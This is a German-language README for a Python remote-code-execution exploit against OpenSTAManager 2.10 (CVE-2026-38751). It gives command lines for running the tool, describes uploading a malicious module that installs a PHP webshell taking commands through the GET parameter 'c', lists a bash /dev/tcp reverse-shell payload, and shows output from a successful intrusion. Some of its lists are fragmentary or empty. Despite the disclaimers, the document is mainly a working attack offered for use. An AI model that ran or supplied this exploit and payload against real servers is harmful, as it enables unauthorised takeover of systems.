
OpenSTAManager RCE Exploit (CVE-2026-38751)
Dieses Python-Skript nutzt eine Remote Code Execution-Schwachstelle in OpenSTAManager Version 2.10 aus, die als CVE-2026-38751 identifiziert wurde. Der Exploit ermöglicht authentifizierten Benutzern das Hochladen eines bösartigen Moduls und die Ausführung beliebiger Befehle auf dem Zielsystem.
Der Exploit durchläuft folgende Schritte:
MODULE)shell.php), das Befehle über den GET-Parameter c ausführtrequests, zipfilepython3 exploit.py -u http://target.com -U admin -P password
python3 exploit.py -u http://target.com -U admin -P password --interactive
python3 exploit.py -u http://target.com -U admin -P password --lhost 10.10.14.180 --lport 4444
shell/MODULE: Modulkonfigurationsdateishell/shell.php: PHP-Webshell, die über den GET-Parameter c übergebene Befehle ausführtid, um zu bestätigen, dass sie funktioniertDer Exploit versucht mehrere Reverse-Shell-Payloads:
bash -i >& /dev/tcp/{lhost}/{lport} 0>&1⚠️ Haftungsausschluss: Dieser Exploit ist ausschließlich für Bildungs- und autorisierte Sicherheitstestzwecke bestimmt.
Diese Schwachstelle ermöglicht:
Zum Schutz vor dieser Schwachstelle:
[ OpenSTAManager RCE Exploit : ]
Target: http://target.com
[*] Step 1: Login...
[+] Login successful: admin
[*] Step 2: Enable updates...
[+] Updates enabled
[*] Step 3: Create ZIP...
[*] Created in-memory ZIP file
[*] Shell location: /modules/shell/shell.php
[*] Step 4: Upload...
[*] Upload status: 200
[+] Upload successful
[*] Step 5: Verify...
[+] Vulnerability confirmed!
[+] Shell: http://target.com/modules/shell/shell.php
[+] Test: http://target.com/modules/shell/shell.php?c=whoami
[*] Entering interactive mode...
cmd> whoami
www-data
cmd> exit
Dieser Exploit wird nur zu Bildungszwecken bereitgestellt. Die unbefugte Nutzung gegen Systeme, die Sie nicht besitzen oder für die Sie keine ausdrückliche Genehmigung zum Testen haben, ist illegal.
| Argument | Beschreibung |
|---|
-u, --url | Ziel-URL (erforderlich) |
-U, --user | Benutzername für die Authentifizierung (erforderlich) |
-P, --password | Passwort für die Authentifizierung (erforderlich) |
--interactive | Interaktiven Shell-Modus aktivieren |
--no-cleanup | Shell-Dateien nach der Ausführung nicht entfernen |
--lhost | Lokaler Host für Reverse-Shell |
--lport | Lokaler Port für Reverse-Shell |